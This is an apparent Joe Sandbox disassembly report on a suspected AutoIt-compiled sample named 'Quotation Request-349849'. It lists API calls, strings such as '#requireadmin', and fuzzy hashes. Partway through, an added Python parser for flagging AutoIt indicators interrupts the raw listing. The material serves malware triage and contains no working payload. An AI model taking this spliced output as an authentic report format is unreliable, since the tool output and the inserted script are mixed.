                                                        • Part of subcall function 0085A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0085A9B0
                                                        • Part of subcall function 0085A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0085A9C5
                                                        • Part of subcall function 0085A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0085A9ED
                                                      Similarity
                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                      • String ID:
                                                      • API String ID: 3521893082-0
                                                      • Opcode ID: b5ee6f862ad5b4a5d85253ae3eed6dae10ec4219788e6b30437296f9ed06c3a2
                                                      • Instruction ID: 5ce28ceea1909f77e11fd79739945c1fb272ef9d86c9c945a8e7cf32ff9d6894
                                                      • Instruction Fuzzy Hash: 1F917D72008305EFCB119F64DC48A5B7BE9FB88322F144B29FAA2D61E2D735D944CB52
                                                      APIs
                                                      • DestroyWindow.USER32(?,?,?), ref: 007D2CA2
                                                      • DeleteObject.GDI32(00000000), ref: 007D2CE8
                                                      • DeleteObject.GDI32(00000000), ref: 007D2CF3
                                                      • DestroyIcon.USER32(00000000,?,?,?), ref: 007D2CFE
                                                      • DestroyWindow.USER32(00000000,?,?,?), ref: 007D2D09
                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 0080C43B
                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0080C474
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0080C89D
                                                        • Part of subcall function 007D1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,007D2036,?,00000000,?,?,?,?,007D16CB,00000000,?), ref: 007D1B9A
                                                      • SendMessageW.USER32(?,00001053), ref: 0080C8DA
                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0080C8F1
                                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0080C907
                                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0080C912
                                                      Similarity
                                                      • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                      • String ID: 0
                                                      • API String ID: 464785882-4108050209
                                                      • Opcode ID: e1d9e0ecb7214f2ac32e1218ac4de5e7bbc8c327bb6e06900b9a7ddba4cbe30d
                                                      • Instruction ID: 7f354c5c0a3dcb475661f3439542d4e59d20ecae28d12f4ace2777eb7e8f3ea0
                                                      • Instruction Fuzzy Hash: E1128E30600201EFDB65CF24C988BA9BBF5FF54301F54466AE959CB2A2C735EC42DBA1
                                                      APIs
                                                      • DestroyWindow.USER32(00000000), ref: 008474DE
                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0084759D
                                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 008475DB
                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 008475ED
                                                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00847633
                                                      • GetClientRect.USER32(00000000,?), ref: 0084763F
                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00847683
                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00847692
                                                      • GetStockObject.GDI32(00000011), ref: 008476A2
                                                      • SelectObject.GDI32(00000000,00000000), ref: 008476A6
                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 008476B6
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008476BF
                                                      • DeleteDC.GDI32(00000000), ref: 008476C8
                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 008476F4
                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 0084770B
                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00847746
                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0084775A
                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 0084776B
                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0084779B
                                                      • GetStockObject.GDI32(00000011), ref: 008477A6
                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 008477B1
                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 008477BB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                      • API String ID: 2910397461-517079104
                                                      • Opcode ID: 742c8b4f60bd4b7fa750abf500f79e3fa17a0e16c0481ef2b1b729e4aefe27fd
                                                      • Instruction ID: 060bc7d535db0ad557264f1b0af1c5c19f2c38a4421bf9f7151a55c164eff539
                                                      • Opcode Fuzzy Hash: 742c8b4f60bd4b7fa750abf500f79e3fa17a0e16c0481ef2b1b729e4aefe27fd
                                                      • Instruction Fuzzy Hash: 7BA15CB1A40609BFEB149BA4DD4AFAE7BB9FB08711F044115FA15EB2E1D774AD00CB60
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0083AD1E
                                                      • GetDriveTypeW.KERNEL32(?,0085FAC0,?,\\.\,0085F910), ref: 0083ADFB
                                                      • SetErrorMode.KERNEL32(00000000,0085FAC0,?,\\.\,0085F910), ref: 0083AF59
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$DriveType
                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                      • API String ID: 2907320926-4222207086
                                                      • Opcode ID: 47e2785da71437a494a506700a4d3b7ecfd8bd80f116f5c332266df1dd4678d9
                                                      • Instruction ID: edb86ceef90d4fdbf7b0368464c7ef2749ba3d4102aec12b2da443c4fcf2d9d5
                                                      • Opcode Fuzzy Hash: 47e2785da71437a494a506700a4d3b7ecfd8bd80f116f5c332266df1dd4678d9
                                                      • Instruction Fuzzy Hash: 6E519DB4648209EB8B18EB14D982CBD73A1FFC8714FA04156E496E73D1DE399D01EB83
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: __wcsnicmp
                                                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                      • API String ID: 1038674560-86951937
                                                      • Opcode ID: 0c610ce58fba5fc884884a47ceb778c69072653a0b4fc28fba5dc4648fe5cb36
                                                      • Instruction ID: 4bcb088dd6c8ca6ff9a13af077b63376b16192c3916c80886f7725192128e06b
                                                      • Opcode Fuzzy Hash: 0c610ce58fba5fc884884a47ceb778c69072653a0b4fc28fba5dc4648fe5cb36
                                                      • Instruction Fuzzy Hash: BE81E9B1640219EACB20BA60DC56FBB3778FF15750F044026FD45AA3D6EB68D945C261
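The per-function entries in this report share one fixed plain-text layout (an APIs list of `Name.MODULE(args), ref: ADDR` lines, then a Similarity block with `API ID`, `String ID`, `API String ID` and the two fuzzy hashes). The following is an added example, not part of the Joe Sandbox report or its IDA plugin: a small parser for that layout that turns each entry into a record and then searches the records for the AutoIt runtime indicators the report surfaces (the `AutoIt v3` window title and the `#include`-style script directives). The two sample entries are constructed inline from the drive-type and directive-parser entries above so the script runs offline; the function names and the `AUTOIT_MARKERS` list are my own choices, not the report's.

```python
"""Parse Joe Sandbox per-function entries (APIs / Similarity blocks) from plain text."""
import re
from dataclasses import dataclass, field

# Constructed sample: two function entries copied in the report's own layout so the
# parser runs offline. Lines the parser ignores (Memory Dump Source etc.) are kept.
SAMPLE_REPORT = r"""APIs
• SetErrorMode.KERNEL32(00000001), ref: 0083AD1E
• GetDriveTypeW.KERNEL32(?,0085FAC0,?,\\.\,0085F910), ref: 0083ADFB
• SetErrorMode.KERNEL32(00000000,0085FAC0,?,\\.\,0085F910), ref: 0083AF59
Strings
Memory Dump Source
• Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
Similarity
• API ID: ErrorMode$DriveType
• String ID: 1394$ATA$ATAPI$CDROM$Fibre$Fixed$Network$Removable$USB$Unknown$\\.\$iSCSI
• API String ID: 2907320926-4222207086
• Instruction Fuzzy Hash: 6E519DB4648209EB8B18EB14D982CBD73A1FFC8714FA04156E496E73D1DE399D01EB83
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#ce$#include$#include-once$#notrayicon$#pragma compile$#requireadmin
• API String ID: 1038674560-86951937
• Instruction Fuzzy Hash: BE81E9B1640219EACB20BA60DC56FBB3778FF15750F044026FD45AA3D6EB68D945C261
"""

# One API line: "Name.MODULE(args), ref: ADDR"; args are optional ("_memset.LIBCMT ref: ...").
API_LINE = re.compile(
    r"^(?:•\s*)?(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$"
)
# One metadata line: "Field Name: value" (API ID, String ID, Instruction Fuzzy Hash, ...).
FIELD_LINE = re.compile(r"^(?:•\s*)?(?P<name>[A-Za-z ]+?):\s*(?P<value>.*)$")

# Strings the report ties to the AutoIt runtime stub (window title, script directives).
# Used here as triage indicators; the selection is an assumption of this example.
AUTOIT_MARKERS = frozenset({
    "AutoIt v3", "AutoIt v3 GUI", "#OnAutoItStartRegister", "#include-once",
    "#notrayicon", "#requireadmin", "#pragma compile",
})


@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)    # (api, module, args, ref)
    fields: dict = field(default_factory=dict)  # "String ID" -> raw "$"-joined value

    @property
    def strings(self):
        """String IDs are '$'-separated; an empty field yields []."""
        return [s for s in self.fields.get("String ID", "").split("$") if s]

    @property
    def fuzzy_hash(self):
        return self.fields.get("Instruction Fuzzy Hash", "")


def parse_api_line(line):
    """Return (api, module, args, ref), or None if the line is not an API call line."""
    m = API_LINE.match(line.strip())
    if not m:
        return None
    return (m["api"], m["mod"], m["args"] or "", m["ref"])


def parse_entries(text):
    """Split the report into entries; each 'APIs' heading starts a new function."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionEntry()
            entries.append(current)
            continue
        if current is None:
            continue
        api = parse_api_line(line)
        if api:
            current.apis.append(api)
            continue
        m = FIELD_LINE.match(line)
        if m:
            current.fields[m["name"]] = m["value"]
        # "Part of subcall function ..." lines and bare section headings are skipped.
    return entries


def autoit_indicators(entries):
    """Entries whose String IDs contain AutoIt markers: (index, fuzzy hash, markers)."""
    hits = []
    for i, e in enumerate(entries):
        found = sorted(s for s in e.strings if s in AUTOIT_MARKERS)
        if found:
            hits.append((i, e.fuzzy_hash, found))
    return hits


def entries_calling(entries, api_name):
    """Indices of entries that call the named API (e.g. 'GetDriveTypeW')."""
    return [i for i, e in enumerate(entries) if any(a[0] == api_name for a in e.apis)]


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE_REPORT)
    for idx, fh, markers in autoit_indicators(parsed):
        print(f"entry {idx} fuzzy={fh[:16]}... markers={markers}")
    print("GetDriveTypeW callers:", entries_calling(parsed, "GetDriveTypeW"))
```

Feeding the script the whole report text instead of `SAMPLE_REPORT` gives one record per function; the fuzzy hash of each hit is what to pivot on when comparing this stub against other compiled-AutoIt droppers, and `entries_calling` is the quick way to find which function the drive-type or window-creation calls belong to.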
                                                      APIs
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00859AD2
                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00859B8B
                                                      • SendMessageW.USER32(?,00001102,00000002,?), ref: 00859BA7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window
                                                      • String ID: 0
                                                      • API String ID: 2326795674-4108050209
                                                      • Opcode ID: 8f6de9cf3c9f9ac9b7ff1fd75ba9b89d541f0c2c2237062fdcb5e1824696d61e
                                                      • Instruction ID: e36e382537a871ca4eb9312b07e5fe5c26ed0aa6c639089931f59d4d324c0f2e
                                                      • Opcode Fuzzy Hash: 8f6de9cf3c9f9ac9b7ff1fd75ba9b89d541f0c2c2237062fdcb5e1824696d61e
                                                      • Instruction Fuzzy Hash: 27028930104301EFEB25CF24C889BAABBE5FF49316F04852DF9D9D62A1D7799948CB52
                                                      APIs
                                                      • GetSysColor.USER32(00000012), ref: 0085A903
                                                      • SetTextColor.GDI32(?,?), ref: 0085A907
                                                      • GetSysColorBrush.USER32(0000000F), ref: 0085A91D
                                                      • GetSysColor.USER32(0000000F), ref: 0085A928
                                                      • CreateSolidBrush.GDI32(?), ref: 0085A92D
                                                      • GetSysColor.USER32(00000011), ref: 0085A945
                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0085A953
                                                      • SelectObject.GDI32(?,00000000), ref: 0085A964
                                                      • SetBkColor.GDI32(?,00000000), ref: 0085A96D
                                                      • SelectObject.GDI32(?,?), ref: 0085A97A
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0085A999
                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0085A9B0
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0085A9C5
                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0085A9ED
                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0085AA14
                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 0085AA32
                                                      • DrawFocusRect.USER32(?,?), ref: 0085AA3D
                                                      • GetSysColor.USER32(00000011), ref: 0085AA4B
                                                      • SetTextColor.GDI32(?,00000000), ref: 0085AA53
                                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0085AA67
                                                      • SelectObject.GDI32(?,0085A5FA), ref: 0085AA7E
                                                      • DeleteObject.GDI32(?), ref: 0085AA89
                                                      • SelectObject.GDI32(?,?), ref: 0085AA8F
                                                      • DeleteObject.GDI32(?), ref: 0085AA94
                                                      • SetTextColor.GDI32(?,?), ref: 0085AA9A
                                                      • SetBkColor.GDI32(?,?), ref: 0085AAA4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                      • String ID:
                                                      • API String ID: 1996641542-0
                                                      • Opcode ID: ac0adfce976a95b0d3271c2436e8f4149edc91692df9f91687e8b899d918e1a5
                                                      • Instruction ID: 730d06516d9eb4e6827c546c460e05ca6b8122e3663a8d46227a7f29fad565eb
                                                      • Opcode Fuzzy Hash: ac0adfce976a95b0d3271c2436e8f4149edc91692df9f91687e8b899d918e1a5
                                                      • Instruction Fuzzy Hash: CE512D71900218EFDF119FA4DC48EAE7BB9FB08322F114625FA11AB2A2D7759940DF90
                                                      APIs
                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00858AC1
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00858AD2
                                                      • CharNextW.USER32(0000014E), ref: 00858B01
                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00858B42
                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00858B58
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00858B69
                                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00858B86
                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00858BD8
                                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00858BEE
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00858C1F
                                                      • _memset.LIBCMT ref: 00858C44
                                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00858C8D
                                                      • _memset.LIBCMT ref: 00858CEC
                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00858D16
                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00858D6E
                                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 00858E1B
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00858E3D
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00858E87
                                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00858EB4
                                                      • DrawMenuBar.USER32(?), ref: 00858EC3
                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00858EEB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                      • String ID: 0
                                                      • API String ID: 1073566785-4108050209
                                                      • Opcode ID: bab9ad65d826c933883c8da9fbe4a7e965610675a4010bcb6abfa8ceb4286bd1
                                                      • Instruction ID: e177743a2d1e9931239eb9bc7b5232befd1398e23189c0ff05e703b4904d0a8f
                                                      • Opcode Fuzzy Hash: bab9ad65d826c933883c8da9fbe4a7e965610675a4010bcb6abfa8ceb4286bd1
                                                      • Instruction Fuzzy Hash: 86E15E70900218EBDB219F54CC84EEE7BB9FF09711F10815AFE15EA291DB748A89DF61
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 008549CA
                                                      • GetDesktopWindow.USER32 ref: 008549DF
                                                      • GetWindowRect.USER32(00000000), ref: 008549E6
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00854A48
                                                      • DestroyWindow.USER32(?), ref: 00854A74
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00854A9D
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00854ABB
                                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00854AE1
                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 00854AF6
                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00854B09
                                                      • IsWindowVisible.USER32(?), ref: 00854B29
                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00854B44
                                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00854B58
                                                      • GetWindowRect.USER32(?,?), ref: 00854B70
                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00854B96
                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00854BB0
                                                      • CopyRect.USER32(?,?), ref: 00854BC7
                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 00854C32
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                      • String ID: ($0$tooltips_class32
                                                      • API String ID: 698492251-4156429822
                                                      • Opcode ID: bc45b385ac19da65e44d2b1ad216b730b58b9f26310f58629492068c1a41e5bc
                                                      • Instruction ID: 21b004bcbe1811f635132b5ae86b2aa345c6e1fa6bb967c172e4a9beb60b1e6f
                                                      • Opcode Fuzzy Hash: bc45b385ac19da65e44d2b1ad216b730b58b9f26310f58629492068c1a41e5bc
                                                      • Instruction Fuzzy Hash: BAB19A70604350AFDB04DF64C849B6ABBE4FF88319F00891DF9999B2A1D774EC49CB56
                                                      APIs
                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 008344AC
                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 008344D2
                                                      • _wcscpy.LIBCMT ref: 00834500
                                                      • _wcscmp.LIBCMT ref: 0083450B
                                                      • _wcscat.LIBCMT ref: 00834521
                                                      • _wcsstr.LIBCMT ref: 0083452C
                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00834548
                                                      • _wcscat.LIBCMT ref: 00834591
                                                      • _wcscat.LIBCMT ref: 00834598
                                                      • _wcsncpy.LIBCMT ref: 008345C3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                      • API String ID: 699586101-1459072770
                                                      • Opcode ID: 7905ffaa3bf77ffe004dc6ad93069abe2911036cf8c485d7847b1320ef1275a7
                                                      • Instruction ID: a9e688153085b4049e90532e597d4d67caa4b97e1680a328acaf93741f67fea8
                                                      • Opcode Fuzzy Hash: 7905ffaa3bf77ffe004dc6ad93069abe2911036cf8c485d7847b1320ef1275a7
                                                      • Instruction Fuzzy Hash: E641D671A41208BBDB11BA748C0BEBF776CFF95710F500069FA05E6383EA6CA90186E5
                                                      APIs
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007D28BC
                                                      • GetSystemMetrics.USER32(00000007), ref: 007D28C4
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007D28EF
                                                      • GetSystemMetrics.USER32(00000008), ref: 007D28F7
                                                      • GetSystemMetrics.USER32(00000004), ref: 007D291C
                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 007D2939
                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 007D2949
                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 007D297C
                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 007D2990
                                                      • GetClientRect.USER32(00000000,000000FF), ref: 007D29AE
                                                      • GetStockObject.GDI32(00000011), ref: 007D29CA
                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 007D29D5
                                                        • Part of subcall function 007D2344: GetCursorPos.USER32(?), ref: 007D2357
                                                        • Part of subcall function 007D2344: ScreenToClient.USER32(008957B0,?), ref: 007D2374
                                                        • Part of subcall function 007D2344: GetAsyncKeyState.USER32(00000001), ref: 007D2399
                                                        • Part of subcall function 007D2344: GetAsyncKeyState.USER32(00000002), ref: 007D23A7
                                                      • SetTimer.USER32(00000000,00000000,00000028,007D1256), ref: 007D29FC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
